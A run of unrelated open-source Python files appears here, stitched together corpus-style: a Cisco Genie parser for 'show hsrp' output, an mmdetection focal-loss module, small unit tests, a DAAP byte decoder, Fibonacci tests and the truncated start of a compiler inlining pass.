from genie.metaparser.util.schemaengine import Schema, Any, Or, Optional
from genie.libs.parser.utils.common import Common
class ShowHsrpStatisticsSchema(MetaParser):
    ''' Schema for commands:
        * show hsrp statistics
    '''

    # Top-level 'hsrp' maps an Any() key (the parser below uses
    # 'statistics') to four counter groups: state transitions, packets
    # sent, valid packets received and invalid packets received.
    schema = {
        'hsrp': {
            Any(): {
                # HSRP state-machine transition counters.
                'protocol': {
                    'active': int,
                    'standby': int,
                    'speak': int,
                    'listen': int,
                    'learn': int,
                    'init': int,
                },
                # Outgoing packet counters by type.
                'packets_sent': {
                    'total_sent': int,
                    'hello': int,
                    'resign': int,
                    'coup': int,
                    'adver': int,
                },
                # Incoming well-formed packet counters by type.
                'valid_packets_received': {
                    'total_received': int,
                    'hello': int,
                    'resign': int,
                    'coup': int,
                    'adver': int,
                },
                # Incoming malformed/rejected packet counters by cause.
                'invalid_packets_received': {
                    'total_invalid_received': int,
                    'too_long': int,
                    'too_short': int,
                    'mismatching_unsupported_versions': int,
                    'invalid_opcode': int,
                    'unknown_group': int,
                    'inoperational_group': int,
                    'conflicting_source_ip': int,
                    'failed_authentication': int,
                    'invalid_hello_time': int,
                    'mismatching_virtual_ip': int,
                },
            }
        }
    }
class ShowHsrpStatistics(ShowHsrpStatisticsSchema):
    ''' Parser for commands:
        * show hsrp statistics
        * show hsrp {interface} statistics
        * show hsrp {interface} {group_number} statistics
    '''

    cli_command = [
        'show hsrp statistics',
        'show hsrp {interface} statistics',
        'show hsrp {interface} {group_number} statistics'
    ]

    def cli(self, interface=None, group_number=None, output=None):
        """Pick/execute the matching CLI command (unless *output* is
        pre-supplied) and parse it into the schema dictionary."""
        if output is None:
            if interface and not group_number:
                cmd = self.cli_command[1].format(interface=interface)
            elif interface and group_number:
                cmd = self.cli_command[2].format(interface=interface,group_number=group_number)
            else:
                cmd = self.cli_command[0]
            out = self.device.execute(cmd)
        else:
            out = output

        # Protocol:
        r1 = re.compile(r'(?P<protocol>Protocol):')

        # Transitions to Active 2
        r2 = re.compile(r'Transitions +to +Active: +(?P<active>\d+)')

        # Transitions to Standby 2
        r3 = re.compile(r'Transitions +to +Standby: +(?P<standby>\d+)')

        # Transitions to Speak 0
        r4 = re.compile(r'Transitions +to +Speak: +(?P<speak>\d+)')

        # Transitions to Listen 2
        r5 = re.compile(r'Transitions +to +Listen: +(?P<listen>\d+)')

        # Transitions to Learn 0
        r6 = re.compile(r'Transitions +to +Learn: +(?P<learn>\d+)')

        # Transitions to Init 0
        r7 = re.compile(r'Transitions +to\s+Init: +(?P<init>\d+)')

        # Packets Sent: 12
        r8 = re.compile(r'(?P<packets_sent>Packets Sent): +(?P<total_sent>\d+)')

        # Hello: 7
        # NOTE: r9-r12 match lines that appear under BOTH "Packets Sent"
        # and "Valid Packets Received"; the loop below relies on
        # packets_sent_rec_dict pointing at whichever section header
        # (r8 or r13) was seen most recently.
        r9 = re.compile(r'Hello: +(?P<hello>\d+)')

        # Resign: 0
        r10 = re.compile(r'Resign: +(?P<resign>\d+)')

        # Coup: 2
        r11 = re.compile(r'Coup: +(?P<coup>\d+)')

        # Adver: 3
        r12 = re.compile(r'Adver: +(?P<adver>\d+)')

        # Valid Packets Received: 13
        r13 = re.compile(r'Valid Packets Received: +(?P<total_received>\d+)')

        # Invalid Packets Received: 0
        r14 = re.compile(r'(?P<invalid_packets_received>Invalid Packets Received:)'
                         r' +(?P<total_invalid_received>\d+)')

        # Too long: 0
        r15 = re.compile(r'Too long: +(?P<too_long>\d+)')

        # Too short: 0
        r16 = re.compile(r'Too short: +(?P<too_short>\d+)')

        # Mismatching/unsupported versions: 0
        r17 = re.compile(r'Mismatching\/unsupported versions:'
                         r' +(?P<mismatching_unsupported_versions>\d+)')

        # Invalid opcode: 0
        r18 = re.compile(r'Invalid opcode: +(?P<invalid_opcode>\d+)')

        # Unknown group: 0
        r19 = re.compile(r'Unknown group: +(?P<unknown_group>\d+)')

        # Inoperational group: 0
        r20 = re.compile(r'Inoperational group: +(?P<inoperational_group>\d+)')

        # Conflicting Source IP: 0
        r21 = re.compile(r'Conflicting Source IP: +(?P<conflicting_source_ip>\d+)')

        # Failed Authentication: 2
        r22 = re.compile(r'Failed Authentication: +(?P<failed_authentication>\d+)')

        # Invalid Hello Time: 0
        r23 = re.compile(r'Invalid Hello Time: +(?P<invalid_hello_time>\d+)')

        # Mismatching Virtual IP: 0
        r24 = re.compile(r'Mismatching Virtual IP: +(?P<mismatching_virtual_ip>\d+)')

        parsed_dict = {}
        # NOTE(review): 'vrf' is assigned but never used below.
        vrf = 'default'

        for line in out.splitlines():
            line = line.strip()

            # Protocol:
            m = r1.match(line)
            if m:
                group = m.groupdict()
                statistics_dict = parsed_dict.setdefault('hsrp', {}).setdefault('statistics', {})
                protocol_dict = statistics_dict.setdefault('protocol', {})
                continue

            # Transitions to Active 2
            m = r2.match(line)
            if m:
                group = m.groupdict()
                protocol_dict['active'] = int(group['active'])
                continue

            # Transitions to Standby 2
            m = r3.match(line)
            if m:
                group = m.groupdict()
                protocol_dict['standby'] = int(group['standby'])
                continue

            # Transitions to Speak 0
            m = r4.match(line)
            if m:
                group = m.groupdict()
                protocol_dict['speak'] = int(group['speak'])
                continue

            # Transitions to Listen 2
            m = r5.match(line)
            if m:
                group = m.groupdict()
                protocol_dict['listen'] = int(group['listen'])
                continue

            # Transitions to Learn 0
            m = r6.match(line)
            if m:
                group = m.groupdict()
                protocol_dict['learn'] = int(group['learn'])
                continue

            # Transitions to Init 0
            m = r7.match(line)
            if m:
                group = m.groupdict()
                protocol_dict['init'] = int(group['init'])
                continue

            # Packets Sent: 12
            # Opens the 'packets_sent' section for r9-r12 below.
            m = r8.match(line)
            if m:
                group = m.groupdict()
                packets_sent_rec_dict = statistics_dict.setdefault('packets_sent', {})
                packets_sent_rec_dict['total_sent'] = int(group['total_sent'])
                continue

            # Valid Packets Received: 13
            # Re-points packets_sent_rec_dict at 'valid_packets_received'.
            m = r13.match(line)
            if m:
                group = m.groupdict()
                packets_sent_rec_dict = statistics_dict.setdefault('valid_packets_received', {})
                packets_sent_rec_dict['total_received'] = int(group['total_received'])
                continue

            # Hello: 7
            m = r9.match(line)
            if m:
                group = m.groupdict()
                packets_sent_rec_dict['hello'] = int(group['hello'])
                continue

            # Resign: 0
            m = r10.match(line)
            if m:
                group = m.groupdict()
                packets_sent_rec_dict['resign'] = int(group['resign'])
                continue

            # Coup: 2
            m = r11.match(line)
            if m:
                group = m.groupdict()
                packets_sent_rec_dict['coup'] = int(group['coup'])
                continue

            # Adver: 3
            m = r12.match(line)
            if m:
                group = m.groupdict()
                packets_sent_rec_dict['adver'] = int(group['adver'])
                continue

            # Invalid packets received: 0
            m = r14.match(line)
            if m:
                group = m.groupdict()
                invalid_packets_received_dict = statistics_dict.setdefault('invalid_packets_received', {})
                invalid_packets_received_dict['total_invalid_received'] = int(group['total_invalid_received'])
                continue

            # Too long: 0
            m = r15.match(line)
            if m:
                group = m.groupdict()
                invalid_packets_received_dict['too_long'] = int(group['too_long'])
                continue

            # Too short: 0
            m = r16.match(line)
            if m:
                group = m.groupdict()
                invalid_packets_received_dict['too_short'] = int(group['too_short'])
                continue

            # Mismatching/unsupported versions: 0
            m = r17.match(line)
            if m:
                group = m.groupdict()
                invalid_packets_received_dict['mismatching_unsupported_versions'] = int(group['mismatching_unsupported_versions'])
                continue

            # Invalid opcode: 0
            m = r18.match(line)
            if m:
                group = m.groupdict()
                invalid_packets_received_dict['invalid_opcode'] = int(group['invalid_opcode'])
                continue

            # Unknown group: 0
            m = r19.match(line)
            if m:
                group = m.groupdict()
                invalid_packets_received_dict['unknown_group'] = int(group['unknown_group'])
                continue

            # Inoperational group: 0
            m = r20.match(line)
            if m:
                group = m.groupdict()
                invalid_packets_received_dict['inoperational_group'] = int(group['inoperational_group'])
                continue

            # Conflicting Source IP: 0
            m = r21.match(line)
            if m:
                group = m.groupdict()
                invalid_packets_received_dict['conflicting_source_ip'] = int(group['conflicting_source_ip'])
                continue

            # Failed Authentication: 2
            m = r22.match(line)
            if m:
                group = m.groupdict()
                invalid_packets_received_dict['failed_authentication'] = int(group['failed_authentication'])
                continue

            # Invalid Hello Time: 0
            m = r23.match(line)
            if m:
                group = m.groupdict()
                invalid_packets_received_dict['invalid_hello_time'] = int(group['invalid_hello_time'])
                continue

            # Mismatching Virtual IP: 0
            m = r24.match(line)
            if m:
                group = m.groupdict()
                invalid_packets_received_dict['mismatching_virtual_ip'] = int(group['mismatching_virtual_ip'])
                continue

        return parsed_dict
class ShowHsrpStatusSchema(MetaParser):
    ''' Schema for commands:
        * show hsrp status
    '''

    schema = {
        'status': {
            # Device clock timestamp printed at the top of the output.
            'clock_time': str,
            'process_started': str,
            'checkpoint_recovered': str,
            'issu_completed': str,
            'issu_aborted': str,
            # Keyed by the lower-cased mode name (e.g. 'primary').
            'mode': {
                Any(): {
                    'mode1_type': str,
                    'issu_state': str,
                    'big_bang_notification': str,
                },
            },
        }
    }
class ShowHsrpStatus(ShowHsrpStatusSchema):
    ''' Parser for commands:
        * show hsrp status
    '''

    cli_command = 'show hsrp status'

    def cli(self, output=None):
        """Execute 'show hsrp status' (unless *output* is pre-supplied)
        and parse it into the schema dictionary."""
        if output is None:
            output = self.device.execute(self.cli_command)

        # Sun Mar 27 20:41:21.974 UTC
        r1 = re.compile(r'(?P<clock_time>\S{3}\s+\S{3}\s+\d+\s+\d+\:\d+\:\d+\.\d+\s+\S+)$')

        # Process started at Mar 10 20:37:22.290 UTC
        r2 = re.compile(r'^Process started at +(?P<process_started>[\w\s\.\:]+)$')

        # Checkpoint recovered Mar 10 20:37:22.385 UTC
        r3 = re.compile(r'^Checkpoint recovered +(?P<checkpoint_recovered>[\w\s\.\:]+)$')

        # Mode is Primary
        r4 = re.compile(r'Mode +is +(?P<mode_state>[a-zA-Z]+)$')

        # ISSU is not in progress
        r5 = re.compile(r'ISSU is +(?P<issu_state>[a-zA-Z ]+)$')

        # Big Bang notification received Never
        r6 = re.compile(r'Big Bang notification +(?P<big_bang_notification>[a-zA-Z ]+)$')

        # ISSU completed Never
        r7 = re.compile(r'^ISSU completed +(?P<issu_completed>[a-zA-Z ]+)$')

        # ISSU aborted Never
        r8 = re.compile(r'^ISSU aborted +(?P<issu_aborted>[a-zA-Z ]+)$')

        parsed_dict = {}

        for line in output.splitlines():
            line = line.strip()

            # Sun Mar 27 20:41:21.974 UTC
            # NOTE: this branch also initializes status_dict, so the clock
            # line is expected to appear before every other matched line.
            m = r1.match(line)
            if m:
                group = m.groupdict()
                status_dict = parsed_dict.setdefault('status', {})
                status_dict['clock_time'] = group['clock_time']
                continue

            # Process started at Mar 10 20:37:22.290 UTC
            m = r2.match(line)
            if m:
                group = m.groupdict()
                status_dict['process_started'] = group['process_started']
                continue

            # Checkpoint recovered Mar 10 20:37:22.385 UTC
            m = r3.match(line)
            if m:
                group = m.groupdict()
                status_dict['checkpoint_recovered'] = group['checkpoint_recovered']
                continue

            # Mode is Primary
            # Opens the per-mode sub-dict used by the r5/r6 branches below.
            m = r4.match(line)
            if m:
                group = m.groupdict()
                model_type = group['mode_state'].lower()
                model_dict = status_dict.setdefault('mode', {}).setdefault(model_type, {})
                model_dict['mode1_type'] = model_type
                continue

            # ISSU is not in progress
            m = r5.match(line)
            if m:
                group = m.groupdict()
                model_dict['issu_state'] = group['issu_state']
                continue

            # Big Bang notification received Never
            m = r6.match(line)
            if m:
                group = m.groupdict()
                model_dict['big_bang_notification'] = group['big_bang_notification']
                continue

            # ISSU completed Never
            m = r7.match(line)
            if m:
                group = m.groupdict()
                status_dict['issu_completed'] = group['issu_completed']
                continue

            # ISSU aborted Never
            m = r8.match(line)
            if m:
                group = m.groupdict()
                status_dict['issu_aborted'] = group['issu_aborted']
                continue

        return parsed_dict
| StarcoderdataPython |
import sys


def min_removals(a):
    """Return the minimum number of deletions so *a* becomes 1, 2, ..., k.

    Scans left to right, keeping each element that equals the next expected
    value of the sequence 1, 2, 3, ...; everything else must be removed.
    Returns -1 when no element equals 1, since no valid sequence can start.
    """
    expected = 1
    for value in a:
        if value == expected:
            expected += 1
    kept = expected - 1
    return len(a) - kept if kept else -1


def main():
    # First line: n (length, read but unused); second line: the sequence.
    read = sys.stdin.readline
    int(read())
    a = list(map(int, read().split()))
    print(min_removals(a))


if __name__ == '__main__':
    # Guarded so importing this module does not consume stdin; the original
    # also bumped the recursion limit and ran at import time, but nothing
    # here recurses.
    main()
4984403 | <reponame>marcovalenti/mmdetection
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.ops import sigmoid_focal_loss as _sigmoid_focal_loss
from mmcv.ops import softmax_focal_loss as _softmax_focal_loss #for diseases
from ..builder import LOSSES
from .utils import weight_reduce_loss
#DEBUG
from torch import Tensor
from typing import Optional, Sequence
# This method is only for debugging (pure-PyTorch reference used when the
# CUDA implementation from mmcv is unavailable, e.g. on CPU).
def py_sigmoid_focal_loss(pred,
                          target,
                          weight=None,
                          gamma=2.0,
                          alpha=0.25,
                          reduction='mean',
                          avg_factor=None):
    """PyTorch version of `Focal Loss <https://arxiv.org/abs/1708.02002>`_.

    Args:
        pred (torch.Tensor): The prediction with shape (N, C), C is the
            number of classes
        target (torch.Tensor): The learning label of the prediction.
        weight (torch.Tensor, optional): Sample-wise loss weight.
        gamma (float, optional): The gamma for calculating the modulating
            factor. Defaults to 2.0.
        alpha (float, optional): A balanced form for Focal Loss.
            Defaults to 0.25.
        reduction (str, optional): The method used to reduce the loss into
            a scalar. Defaults to 'mean'.
        avg_factor (int, optional): Average factor that is used to average
            the loss. Defaults to None.
    """
    pred_sigmoid = pred.sigmoid()
    target = target.type_as(pred)
    # pt here is (1 - p_t): the probability mass on the wrong class, so
    # pt.pow(gamma) down-weights easy examples and focuses on hard ones.
    pt = (1 - pred_sigmoid) * target + pred_sigmoid * (1 - target)
    focal_weight = (alpha * target + (1 - alpha) *
                    (1 - target)) * pt.pow(gamma)
    loss = F.binary_cross_entropy_with_logits(
        pred, target, reduction='none') * focal_weight
    if weight is not None:
        if weight.shape != loss.shape:
            if weight.size(0) == loss.size(0):
                # For most cases, weight is of shape (num_priors, ),
                #  which means it does not have the second axis num_class
                weight = weight.view(-1, 1)
            else:
                # Sometimes, weight per anchor per class is also needed. e.g.
                #  in FSAF. But it may be flattened of shape
                #  (num_priors x num_class, ), while loss is still of shape
                #  (num_priors, num_class).
                assert weight.numel() == loss.numel()
                weight = weight.view(loss.size(0), -1)
        assert weight.ndim == loss.ndim
    # weight_reduce_loss handles weight=None and applies the reduction.
    loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
    return loss
def sigmoid_focal_loss(pred,
                       target,
                       weight=None,
                       gamma=2.0,
                       alpha=0.25,
                       reduction='mean',
                       avg_factor=None):
    r"""A warpper of cuda version `Focal Loss
    <https://arxiv.org/abs/1708.02002>`_.

    Args:
        pred (torch.Tensor): The prediction with shape (N, C), C is the number
            of classes.
        target (torch.Tensor): The learning label of the prediction.
        weight (torch.Tensor, optional): Sample-wise loss weight.
        gamma (float, optional): The gamma for calculating the modulating
            factor. Defaults to 2.0.
        alpha (float, optional): A balanced form for Focal Loss.
            Defaults to 0.25.
        reduction (str, optional): The method used to reduce the loss into
            a scalar. Defaults to 'mean'. Options are "none", "mean" and "sum".
        avg_factor (int, optional): Average factor that is used to average
            the loss. Defaults to None.
    """
    # Function.apply does not accept keyword arguments, so the decorator
    # "weighted_loss" is not applicable
    loss = _sigmoid_focal_loss(pred.contiguous(), target, gamma, alpha, None,
                               'none')
    if weight is not None:
        if weight.shape != loss.shape:
            if weight.size(0) == loss.size(0):
                # For most cases, weight is of shape (num_priors, ),
                #  which means it does not have the second axis num_class
                weight = weight.view(-1, 1)
            else:
                # Sometimes, weight per anchor per class is also needed. e.g.
                #  in FSAF. But it may be flattened of shape
                #  (num_priors x num_class, ), while loss is still of shape
                #  (num_priors, num_class).
                assert weight.numel() == loss.numel()
                weight = weight.view(loss.size(0), -1)
        assert weight.ndim == loss.ndim
    # weight_reduce_loss handles weight=None and applies the reduction.
    loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
    return loss
# added for diseases (multi-class, softmax-based variant)
def softmax_focal_loss(pred,
                       target,
                       weight,
                       gamma=2.0,
                       alpha=0.25,
                       reduction='mean',
                       class_weight=None,
                       avg_factor=None):
    r"""A warpper of cuda version `Focal Loss
    <https://arxiv.org/abs/1708.02002>`_.

    Args:
        pred (torch.Tensor): The prediction with shape (N, C), C is the number
            of classes.
        target (torch.Tensor): The learning label of the prediction.
        weight (torch.Tensor): Sample-wise loss weight.
        gamma (float, optional): The gamma for calculating the modulating
            factor. Defaults to 2.0.
        alpha (float, optional): A balanced form for Focal Loss.
            Defaults to 0.25.
        reduction (str, optional): The method used to reduce the loss into
            a scalar. Defaults to 'mean'. Options are "none", "mean" and "sum".
        avg_factor (int, optional): Average factor that is used to average
            the loss. Defaults to None.
        class_weight (list[float], optional): The weight for each class.
    """
    #loss = _softmax_focal_loss(pred.contiguous(), target, gamma, alpha, weight,
    #                           reduction)
    #NOTE: in this case sum is used for a bug in softmax_focal_loss
    #that doesn't consider the case of reduction = none. For this reason
    #weight_reduce_loss cannot be used
    loss = _softmax_focal_loss(pred.contiguous(), target, gamma, alpha, class_weight,
                               'sum')
    # apply weights and do the reduction
    # NOTE(review): the result of weight.float() is discarded, so the
    # sample-wise 'weight' argument currently has no effect -- confirm
    # whether per-sample weighting was intended here.
    if weight is not None:
        weight = weight.float()
    #import ipdb; ipdb.set_trace()
    #loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
    # Assumes avg_factor is always provided by the caller (a None value
    # would raise TypeError here) -- TODO confirm against call sites.
    return loss / avg_factor
@LOSSES.register_module()
class FocalLoss(nn.Module):
    """Focal Loss module dispatching between the sigmoid (binary/multilabel)
    and softmax (multi-class) variants, using the CUDA kernels when the
    input lives on a GPU."""

    def __init__(self,
                 use_sigmoid=True,
                 gamma=2.0,
                 alpha=0.25,
                 reduction='mean',
                 class_weight=None,
                 loss_weight=1.0):
        """`Focal Loss <https://arxiv.org/abs/1708.02002>`_

        Args:
            use_sigmoid (bool, optional): Whether to the prediction is
                used for sigmoid or softmax. Defaults to True.
            gamma (float, optional): The gamma for calculating the modulating
                factor. Defaults to 2.0.
            alpha (float, optional): A balanced form for Focal Loss.
                Defaults to 0.25.
            reduction (str, optional): The method used to reduce the loss into
                a scalar. Defaults to 'mean'. Options are "none", "mean" and
                "sum".
            class_weight (list[float], optional): Per-class weights used by
                the softmax variant only.
            loss_weight (float, optional): Weight of loss. Defaults to 1.0.
        """
        super(FocalLoss, self).__init__()
        # Kept for reference: the sigmoid-only restriction was lifted when
        # the softmax variant was added for diseases.
        #assert use_sigmoid is True, 'Only sigmoid focal loss supported now.'
        self.use_sigmoid = use_sigmoid
        self.gamma = gamma
        self.alpha = alpha
        self.reduction = reduction
        self.class_weight = class_weight
        self.loss_weight = loss_weight

    def forward(self,
                pred,
                target,
                weight=None,
                avg_factor=None,
                reduction_override=None):
        """Forward function.

        Args:
            pred (torch.Tensor): The prediction.
            target (torch.Tensor): The learning label of the prediction.
            weight (torch.Tensor, optional): The weight of loss for each
                prediction. Defaults to None.
            avg_factor (int, optional): Average factor that is used to average
                the loss. Defaults to None.
            reduction_override (str, optional): The reduction method used to
                override the original reduction method of the loss.
                Options are "none", "mean" and "sum".

        Returns:
            torch.Tensor: The calculated loss
        """
        assert reduction_override in (None, 'none', 'mean', 'sum')
        reduction = (
            reduction_override if reduction_override else self.reduction)
        if self.use_sigmoid:
            # CUDA kernel on GPU; pure-PyTorch fallback (with one-hot
            # encoded targets) on CPU.
            if torch.cuda.is_available() and pred.is_cuda:
                calculate_loss_func = sigmoid_focal_loss
            else:
                num_classes = pred.size(1)
                target = F.one_hot(target, num_classes=num_classes + 1)
                target = target[:, :num_classes]
                calculate_loss_func = py_sigmoid_focal_loss

            loss_cls = self.loss_weight * calculate_loss_func(
                pred,
                target,
                weight,
                gamma=self.gamma,
                alpha=self.alpha,
                reduction=reduction,
                avg_factor=avg_factor)

        else:
            #raise NotImplementedError
            # The softmax variant only has a CUDA implementation; CPU
            # execution is not supported.
            if torch.cuda.is_available() and pred.is_cuda:
                calculate_loss_func = softmax_focal_loss
            else:
                raise NotImplementedError
            if self.class_weight is not None:
                class_weight = pred.new_tensor(
                    self.class_weight, device=pred.device)
            else:
                class_weight = None
            loss_cls = self.loss_weight * calculate_loss_func(
                pred,
                target,
                weight,
                gamma=self.gamma,
                alpha=self.alpha,
                class_weight=class_weight,
                reduction=reduction,
                avg_factor=avg_factor)

        return loss_cls
# for debugging: pure-PyTorch focal loss used to cross-check the CUDA variants
@LOSSES.register_module()
class py_FocalLoss(nn.Module):
    """ Focal Loss, as described in https://arxiv.org/abs/1708.02002.
    It is essentially an enhancement to cross entropy loss and is
    useful for classification tasks when there is a large class imbalance.
    x is expected to contain raw, unnormalized scores for each class.
    y is expected to contain class labels.
    Shape:
        - x: (batch_size, C) or (batch_size, C, d1, d2, ..., dK), K > 0.
        - y: (batch_size,) or (batch_size, d1, d2, ..., dK), K > 0.
    """

    def __init__(self,
                 alpha: Optional[Tensor] = None,
                 gamma: float = 0.,
                 reduction: str = 'mean',
                 ignore_index: int = -100):
        """Constructor.

        Args:
            alpha (Tensor, optional): Weights for each class. Defaults to None.
            gamma (float, optional): A constant, as described in the paper.
                Defaults to 0.
            reduction (str, optional): 'mean', 'sum' or 'none'.
                Defaults to 'mean'.
            ignore_index (int, optional): class label to ignore.
                Defaults to -100.
        """
        if reduction not in ('mean', 'sum', 'none'):
            raise ValueError(
                'Reduction must be one of: "mean", "sum", "none".')
        super().__init__()
        self.alpha = alpha
        self.gamma = gamma
        self.ignore_index = ignore_index
        self.reduction = reduction
        # nll_loss supplies the -alpha * log(pt) term; reduction is applied
        # manually at the end of forward().
        self.nll_loss = nn.NLLLoss(
            weight=alpha, reduction='none', ignore_index=ignore_index)

    def __repr__(self):
        arg_keys = ['alpha', 'gamma', 'ignore_index', 'reduction']
        arg_vals = [self.__dict__[k] for k in arg_keys]
        arg_strs = [f'{k}={v}' for k, v in zip(arg_keys, arg_vals)]
        arg_str = ', '.join(arg_strs)
        return f'{type(self).__name__}({arg_str})'

    def forward(self, x: Tensor, y: Tensor) -> Tensor:
        if x.ndim > 2:
            # (N, C, d1, d2, ..., dK) --> (N * d1 * ... * dK, C)
            c = x.shape[1]
            x = x.permute(0, *range(2, x.ndim), 1).reshape(-1, c)
            # (N, d1, d2, ..., dK) --> (N * d1 * ... * dK,)
            y = y.view(-1)

        # Drop entries labelled with ignore_index before computing the loss.
        unignored_mask = y != self.ignore_index
        y = y[unignored_mask]
        if len(y) == 0:
            # NOTE(review): returns a plain float, not a Tensor -- confirm
            # downstream callers tolerate this on all-ignored batches.
            return 0.
        x = x[unignored_mask]

        # compute weighted cross entropy term: -alpha * log(pt)
        # (alpha is already part of self.nll_loss)
        log_p = F.log_softmax(x, dim=-1)
        ce = self.nll_loss(log_p, y)

        # get true class column from each row
        all_rows = torch.arange(len(x))
        log_pt = log_p[all_rows, y]

        # compute focal term: (1 - pt)^gamma
        pt = log_pt.exp()
        focal_term = (1 - pt)**self.gamma

        # the full loss: -alpha * ((1 - pt)^gamma) * log(pt)
        loss = focal_term * ce

        if self.reduction == 'mean':
            loss = loss.mean()
        elif self.reduction == 'sum':
            loss = loss.sum()

        return loss
def focal_loss(alpha: Optional[Sequence] = None,
               gamma: float = 0.,
               reduction: str = 'mean',
               ignore_index: int = -100,
               device='cpu',
               dtype=torch.float32) -> 'py_FocalLoss':
    """Factory function for py_FocalLoss.

    Args:
        alpha (Sequence, optional): Weights for each class. Will be converted
            to a Tensor if not None. Defaults to None.
        gamma (float, optional): A constant, as described in the paper.
            Defaults to 0.
        reduction (str, optional): 'mean', 'sum' or 'none'.
            Defaults to 'mean'.
        ignore_index (int, optional): class label to ignore.
            Defaults to -100.
        device (str, optional): Device to move alpha to. Defaults to 'cpu'.
        dtype (torch.dtype, optional): dtype to cast alpha to.
            Defaults to torch.float32.

    Returns:
        A py_FocalLoss object
    """
    if alpha is not None:
        if not isinstance(alpha, Tensor):
            alpha = torch.tensor(alpha)
        alpha = alpha.to(device=device, dtype=dtype)
    # Bug fix: this previously instantiated ``FocalLoss`` (the registered
    # mmdet loss above), whose __init__ accepts neither a Tensor ``alpha``
    # nor an ``ignore_index`` keyword and therefore raised TypeError.  The
    # intended target is the pure-PyTorch ``py_FocalLoss`` defined above.
    fl = py_FocalLoss(
        alpha=alpha,
        gamma=gamma,
        reduction=reduction,
        ignore_index=ignore_index)
    return fl
| StarcoderdataPython |
9647385 | from grimp.domain.valueobjects import Module, DirectImport
class TestModule:
    def test_repr(self):
        assert repr(Module("foo.bar")) == "<Module: foo.bar>"

    def test_equals(self):
        first = Module("foo.bar")
        duplicate = Module("foo.bar")
        child = Module("foo.bar.baz")

        assert first == duplicate
        assert first != child
        # Instances of other types never compare equal.
        assert first != "foo"

    def test_hash(self):
        first = Module("foo.bar")
        duplicate = Module("foo.bar")
        child = Module("foo.bar.baz")

        assert hash(first) == hash(duplicate)
        assert hash(first) != hash(child)

    def test_package_name(self):
        assert Module("foo.bar.baz").package_name == "foo"
class TestDirectImport:
    @staticmethod
    def _build(importer="foo", imported="bar", line_number=10,
               line_contents="import bar"):
        """Build a DirectImport, overriding only the supplied fields."""
        return DirectImport(
            importer=Module(importer),
            imported=Module(imported),
            line_number=line_number,
            line_contents=line_contents,
        )

    def test_repr(self):
        assert repr(self._build()) == "<DirectImport: foo -> bar (l. 10)>"

    def test_equals(self):
        baseline = self._build()

        # Identical field values compare equal.
        assert baseline == self._build()
        # Changing any single field breaks equality.
        assert baseline != self._build(imported="baz")
        assert baseline != self._build(importer="foobar")
        assert baseline != self._build(line_number=11)
        assert baseline != self._build(line_contents="from . import bar")
        # Also non-DirectImport instances should not be treated as equal.
        assert baseline != "foo"

    def test_hash(self):
        baseline = self._build()

        # Equal objects hash equally; any differing field changes the hash.
        assert hash(baseline) == hash(self._build())
        assert hash(baseline) != hash(self._build(imported="baz"))
        assert hash(baseline) != hash(self._build(importer="foobar"))
        assert hash(baseline) != hash(self._build(line_number=11))
        assert hash(baseline) != hash(self._build(line_contents="from . import bar"))
| StarcoderdataPython |
3406603 | import struct
class DaapNumericReader(object):
    """Decodes raw big-endian DAAP byte strings into Python integers."""

    @classmethod
    def uint8(cls, b):
        """Decode 1 byte as an unsigned big-endian number."""
        return struct.unpack('>B', b)[0]

    @classmethod
    def uint16(cls, b):
        """Decode 2 bytes as an unsigned big-endian number."""
        return struct.unpack('>H', b)[0]

    @classmethod
    def uint32(cls, b):
        """Decode 4 bytes as an unsigned big-endian number."""
        return struct.unpack('>I', b)[0]

    @classmethod
    def uint64(cls, b):
        """Decode 8 bytes as an unsigned big-endian number."""
        return struct.unpack('>Q', b)[0]

    @classmethod
    def int8(cls, b):
        """Decode 1 byte as a signed big-endian number."""
        return struct.unpack('>b', b)[0]

    @classmethod
    def int16(cls, b):
        """Decode 2 bytes as a signed big-endian number."""
        return struct.unpack('>h', b)[0]

    @classmethod
    def int32(cls, b):
        """Decode 4 bytes as a signed big-endian number."""
        return struct.unpack('>i', b)[0]

    @classmethod
    def int64(cls, b):
        """Decode 8 bytes as a signed big-endian number."""
        return struct.unpack('>q', b)[0]
| StarcoderdataPython |
1852199 | <gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Fibonacci numbers test module."""
__author__ = "<NAME>"
from pytest import mark, raises
from fibonacci_gen import fibonacci_gen as fib_gen
from fibonacci_rec import fibonacci_rec as fib_rec
from even_fibonacci_gen import even_fibonacci_gen as efib_gen
@mark.parametrize("nonint", [2.5, "3", [4]])
def test_non_integers(nonint):
"""Test non-integers."""
with raises(TypeError):
fib_gen(nonint)
with raises(TypeError):
fib_rec(nonint)
with raises(TypeError):
efib_gen(nonint)
@mark.parametrize("invint", [-2, 0])
def test_invalid_integers(invint):
"""Test invalid integers."""
with raises(ValueError):
fib_gen(invint)
with raises(ValueError):
fib_rec(invint)
with raises(ValueError):
efib_gen(invint)
@mark.parametrize("nth", list(range(1, 101)))
def test_fibonacci_nth(nth):
"""Test n first terms."""
infibgen = fib_gen()
infslice = [next(infibgen) for _ in range(nth)]
fibrec = [fib_rec(term) for term in range(1, nth + 1)]
fibgen = list(fib_gen(nth))
assert fibgen == infslice == fibrec
@mark.parametrize(
    "nth, res",
    [
        (1, [0]),
        (2, [0, 2]),
        (4, [0, 2, 8, 34]),
        (10, [0, 2, 8, 34, 144, 610, 2584, 10946, 46368, 196418]),
    ],
)
def test_even_fibonacci_nth(nth, res):
    """Bounded and unbounded even-Fibonacci generators match the expected terms."""
    unbounded = efib_gen()
    prefix = [next(unbounded) for _ in range(nth)]
    assert list(efib_gen(nth)) == prefix == res
| StarcoderdataPython |
1807592 | # TODO: Ensure that functions marked for inlining aren't recursive to
# prevent infinite loops.
from typing import Collection, List, Sequence, Set, Tuple
from asts import lowered, visitor
from scope import Scope
calc_threshold = lambda value: value * 20
def expand_inline(tree: lowered.LoweredASTNode, level: int) -> lowered.LoweredASTNode:
"""
Inline unnecessary or trivial functions to make the program run faster.
Parameters
----------
tree: lowered.LoweredASTNode
The tree without any inlined functions.
level: int
How aggressive the inline expander should be in optimising.
Returns
-------
lowered.LoweredASTNode
The tree with as many functions inlines as is reasonable.
"""
level = calc_threshold(level)
finder = _Finder()
finder.run(tree)
targets = generate_targets(finder.funcs, finder.defined_funcs, level)
inliner = _Inliner(targets)
return inliner.run(tree)
class _Scorer(visitor.LoweredASTVisitor[int]):
    """
    Weigh a piece of the AST for inlining purposes.

